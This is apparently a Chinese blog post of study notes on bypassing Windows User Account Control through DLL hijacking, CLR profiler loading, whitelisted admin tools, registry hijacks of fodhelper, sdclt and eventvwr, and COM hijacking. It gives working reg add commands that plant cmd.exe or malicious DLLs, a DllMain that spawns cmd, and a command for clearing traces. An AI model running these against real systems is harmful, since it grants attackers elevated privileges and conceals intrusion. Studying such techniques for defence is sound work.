UAC

用户帐户控制(User Account Control,简写作UAC)是微软公司在其[Windows Vista](https://baike.baidu.com/item/Windows Vista)及更高版本操作系统中采用的一种控制机制,保护系统进行不必要的更改,提升操作系统的稳定性和安全性。
管理员在正常情况下是以低权限运行任务的,这个状态被称为被保护的管理员。但当管理员要执行高风险操作(如安装程序等),就需要提升权限去完成这些任务。这个提升权限的过程通常是这样的,相信各位都眼熟过。

image-20210227191310985

点击“是”,管理员就会提升到高权限再去运行该任务。

autoElevate与requestedExecutionLevel

autoElevate

当某个EXE文件的文件清单里有<autoElevate> 元素时,当执行该文件时会默认提权执行。
我们劫持该exe文件的dll,可以达到Bypass UAC提权的目的。
适用范围:管理员权限以获得,要得到高权限管理员权限

一般用工具sigcheck检测

网上常拿C:\Windows\SysWOW64\SystemPropertiesAdvanced.exe 举列子

image-20210301000136728

image-20210301000141880

这个东西很有用,是下面部分方法的前提条件

requestedExecutionLevel

image-20210302125607741

有三个不同的参数:asInvoker requireAdministrator highestAvailable 分别对应应用程序以什么权限运行

asInvoker:父进程是什么权限,此应用程序就是什么权限

requireAdministrator:需要以管理员权限来运行,此类应用程序图标右下方会有个盾牌标记image-20210302125851318

highestAvailable:此程序以当前用户能获取到的最高权限运行。当你在管理员账户下运行此程序就会要求权限提升以及弹出UAC框。当你在标准账户下运行此程序,由于此账户的最高权限就是标准账户,所以双击便运行

白名单程序

除了刚刚说的autoelevate,还有一类叫白名单程序的应用程序也是打开默认提权的。如服务管理工具下的许多应用都属于白名单程序,而其中又有些程序执行时需要依赖CLR支持(如事件查看器,任务计划程序)

Bypass UAC

DLL劫持

reference:https://www.anquanke.com/post/id/209033
https://www.cnblogs.com/0daybug/p/11719541.html

exe文件运行时会加载许多dll文件,这些dll文件的加载顺序是

  • 程序所在目录

  • 系统目录即SYSTEM32目录

  • 16位系统目录即SYSTEM目录

  • Windows目录

  • 程序加载目录(SetCurrentDirecctory)

  • PATH环境变量中列出的目录

    同时,dll加载也遵循着Know DLLs注册表项的机制:Know DLLs注册表项指定的DLL是已经被操作系统加载过后的DLL,不会被应用程序搜索并加载。在注册表HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager\KnownDLLS处可以看见这些dll

    image-20210301184035776

在knowdlls表项中的dll是预先就加载进内存空间的,被诸多应用调用着,改动需要高权限。

如果我们在应用程序找到正确的dll之前,将我们自己创造的dll放入优先级更高的搜索目录让应用程序优先加载此dll文件,这就造成了dll劫持。但这只是dll劫持的其中一种途径,他有这些途径:

(1) DLL替换:用恶意的DLL替换掉合法的DLL
(2) DLL搜索顺序劫持:当应用程序加载DLL的时候,如果没有带指定DLL的路径,那么程序将会以特定的顺序依次在指定的路径下搜索待加载的DLL。通过将恶意DLL放在真实DLL之前的搜索位置,就可以劫持搜索顺序,劫持的目录有时候包括目标应用程序的工作目录。
(3) 虚拟DLL劫持:释放一个恶意的DLL来代替合法应用程序加载的丢失/不存在的DLL
(4) DLL重定向:更改DLL搜索的路径,比如通过编辑%PATH%环境变量或 .exe.manifest/.exe.local文件以将搜索路径定位到包含恶意DLL的地方。
(5) WinSxS DLL替换:将目标DLL相关的WinSxS文件夹中的恶意DLL替换为合法的DLL。此方法通常也被称为DLL侧加载
(6) 相对路径DLL劫持:将合法的应用程序复制(并有选择地重命名)与恶意的DLL一起放入到用户可写的文件夹中。在使用方法上,它与(签名的)二进制代理执行有相似之处。它的一个变体是(有点矛盾地称为)“自带LOLbin”,其中合法的应用程序带有恶意的DLL(而不是从受害者机器上的合法位置复制)。

实践出真知1

这里我们先用第一种方法来进行实验,实验对象是C:\Windows\SysWOW64\SystemPropertiesAdvanced.exe和Listary。Listary是一个很好用的检索小工具,我通过processmonitor,设置好过滤条件,查看SystemPropertiesAdvanced.exe调用的dll时发现它会调用一个Listary下的一个名为ListaryHook.dll的dll。image-20210302132631680

由于listary目录权限不高,我们可以直接替换该dll,换成dllmain为打开cmd的dll。然后点击运行SystemPropertiesAdvanced.exe,就会发现会弹出高权限cmd窗口image-20210302132724843

bypassuac成功。 当然这种都不能算是一个洞,listary并不是人人电脑上都有的,而且这个软件装机量应该是极少数少的,所以这里只是提供一个思路,这种洞该怎么去找。

实践出真知2

这里使用第三种方法进行实验,实验对象是eventvwr.msc,它是管理工具中的事件查看器,它依赖于mmc.exe来运行。比如,你想运行它,就得通过mmc eventvwr.msc来运行它,并且在process exploer中只能看到个mmc.exe。

我们process monitor设置过滤如下

image-20210302205938167

cmd运行 mmc eventvwr.msc,查看调用

image-20210302210053342

dll搜索顺序确实是 程序目录->SYSTEM32->SYSTEM->WINDOWS->当前目录(这里也是SYSTEM32目录,我认为的原因是mmc会自动提升权限导致当前目录为System32导致的)->PATH目录。

我们只需在可写目录下植入名为elsext.dll的恶意dll,处理好dll的dllmain函数,就能让dllmain里的指令被高权限执行

但是无奈我这里环境是win7 sp1,但是这个洞7600才出现,所以复现不了了。但大概思路就是这样的

CLR加载任意DLL

CLR是微软为.net运行时提供的环境,像java的虚拟机一样,而clr有一个Profiling机制。这个机制简而言之便是可以给CLR提供一个dll,当任何高权限.NET运行时都会主动加载该DLL,我们可以构造恶意dll给CLR加载,从而获得高权限的进程如cmd,从而bypassuac。

至于这个dll如何给CLR,是通过修改以下环境变量实现的

COR_ENABLE_PROFILING = 1

COR_PROFILER={CLSIDor ProgID}

CLR会检查环境变量中的COR_ENABLE_PROFILING,若为1则检查通过,进行下一步。
在net4.0以前,若检查通过,会马上去查找COR_PROFILER指定的注册表项,找到其dll路径并加载
net4.0后,会先查找COR_PROFILER_PATH是否指定dll文件路径,若没有再去查找COR_PROFILER指定的注册表项,找到其dll路径并加载。
总而言之,我们设置好COR_ENABLE_PROFILING和COR_PROFILER两个项就可以了。

接下来我们设置用户环境变量,设置用户环境变量时不需要高权限(win10似乎设置系统环境变量也不需要)。
以及在注册表,在指定的CLSID属性下新建Inprocserver32项,并写入恶意dll路径. 然后通过mmc调用一下gpedit.msc这种程序,即可以高权限执行dll。如果dll执行命令为system(“cmd.exe”) 那么就会蹦出来高权限cmd窗口

REG ADD "HKCU\Software\Classes\CLSID\{FFFFFFFF-FFFF-FFFF-FFFF-FFFFFFFFFFFF}\InprocServer32" /ve /t REG_EXPAND_SZ /d "C:\test\calc.dll" /f
REG ADD "HKCU\Environment" /v "COR_PROFILER" /t REG_SZ /d "{FFFFFFFF-FFFF-FFFF-FFFF-FFFFFFFFFFFF}" /f
REG ADD "HKCU\Environment" /v "COR_ENABLE_PROFILING" /t REG_SZ /d "1" /f
mmc gpedit.msc

但我死活复现不起不知道为啥,我的dll这样写的

// dllmain.cpp : 定义 DLL 应用程序的入口点。
#include "pch.h"
#include <iostream>
#include <Windows.h>

BOOL WINAPI DllMain(HINSTANCE hinstDLL, DWORD fdwReason, LPVOID lpReserved)
{
char cmd[] = "cmd.exe";

switch (fdwReason)
{
case DLL_PROCESS_ATTACH:
WinExec(cmd, SW_SHOWNORMAL);
ExitProcess(0);
break;
case DLL_THREAD_ATTACH:
break;
case DLL_THREAD_DETACH:
break;
case DLL_PROCESS_DETACH:
break;
}
return TRUE;
}

另外的,你还可以为COR_PROFILER_PATH设置为如\\server\share\test.dll的smb的路径,这样也可以实现bypassuac(没复现)

白名单程序

odbcad32.exe

这个方法很简单。打开C:\Windows\system32\odbcad32.exe,然后通过以下方法打开powershell或者cmd

image-20210302133941728

成功bypass

image-20210302134014137

管理工具

之前说过,管理工具有很多白名单程序,如果一个白名单程序有浏览文件目录的功能,就可以以此来创建高权限cmd窗口。这里拿事件查看器举例

操作-》打开保存的目录-》文件目录路径处输入powershell-》弹出高权限powershell 以此内推,还有很多相似的管理工具可以这样利用

注册表劫持

Fodhelper.exe

Fodhelper.exe win10才有,所以只有win10能通过这个办法bypassuac,他是一个autoelevate元素程序

我们使用proceemonitor查看事件查看器启动的时候执行了什么。我们通过排查发现了此处

image-20210302194843185

发现程序试图打开HKCU\Software\Classes\ms-settings\shell\open\command,但是这个项没有找到,因为这个项并不存在,于是它查询 HKCR\ms-settings\Shell\Open,查询成功便打开其下的Command键进行查询。
我们可以劫持注册表,往HKCU\Software\Classes\ms-settings\shell\open\command写入恶意指令从而达到bypassuac的目的。

reg add HKEY_CURRENT_USER\Software\Classes\ms-settings\shell\open\command /d C:\Windows\System32\cmd.exe /f 
reg add HKEY_CURRENT_USER\Software\Classes\ms-settings\shell\open\command /v DelegateExecute /t REG_DWORD /d 00000000 /f

我们写入如下命令,就能让Fodhelper.exe 执行时自动高权限执行cmd窗口了

然后消除痕迹

reg delete "HKEY_CURRENT_USER\Software\Classes\ms-settings\shell\open\command"

sdclt

Win10后这个程序才有自动提升权限的能力

reg add "HKCU\Software\Classes\Folder\shell\open\command" /d C:\Windows\System32\cmd.exe /f 
reg add "HKCU\Software\Classes\Folder\shell\open\command" /v "DelegateExecute" /f

image-20210302201240945

eventvmr

reg add "HKCU\Software\Classes\mscfile\shell\open\command" /d C:\Windows\System32\cmd.exe /f

win10,win7均无效,不知道是哪个版本的事了,反正记录下来吧。

COM劫持

和dll劫持类似,应用程序在运行时也会去加载指定CLSID的COM组件,其加载顺序如下

HKCU\Software\Classes\CLSID
HKCR\CLSID
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\ShellCompatibility\Objects\

以eventvwr为例

执行该程序时会去寻找{0A29FF9E-7F9C-4437-8B11-F424491E3931}这个组件,这个组件又需要加载InProcServer32指定的DLL,而这个DLL的路径可由用户定义。

而eventvwr的这个组件一般在HKCR\CLSID找到,所以可以搜索路径劫持。

利用以下方法可以劫持(搜索路径劫持)

reg add HKEY_CURRENT_USER\Software\Classes\CLSID\{0A29FF9E-7F9C-4437-8B11-F424491E3931}\InProcServer32 /v "" /t REG_SZ /d "d:\msf_x64.dll" /f 

reg add HKEY_CURRENT_USER\Software\Classes\CLSID\{0A29FF9E-7F9C-4437-8B11-F424491E3931}\InProcServer32 /v "LoadWithoutCOM" /t REG_SZ /d "" /f

reg add HKEY_CURRENT_USER\Software\Classes\CLSID\{0A29FF9E-7F9C-4437-8B11-F424491E3931}\InProcServer32 /v "ThreadingModel" /t REG_SZ /d "Apartment" /f

reg add HKEY_CURRENT_USER\Software\Classes\CLSID\{0A29FF9E-7F9C-4437-8B11-F424491E3931}\ShellFolder /v "HideOnDesktop" /t REG_SZ /d "" /f

reg add HKEY_CURRENT_USER\Software\Classes\CLSID\{0A29FF9E-7F9C-4437-8B11-F424491E3931}\ShellFolder /v "Attributes" /t REG_DWORD /d 0xf090013d /f

利用com接口

ICMLuaUtil

image-20210304122737764

UACME

一个开源项目,记录了许多Bypassuac的方法。

https://github.com/hfiref0x/UACME/tree/v3.2.x

windbg调试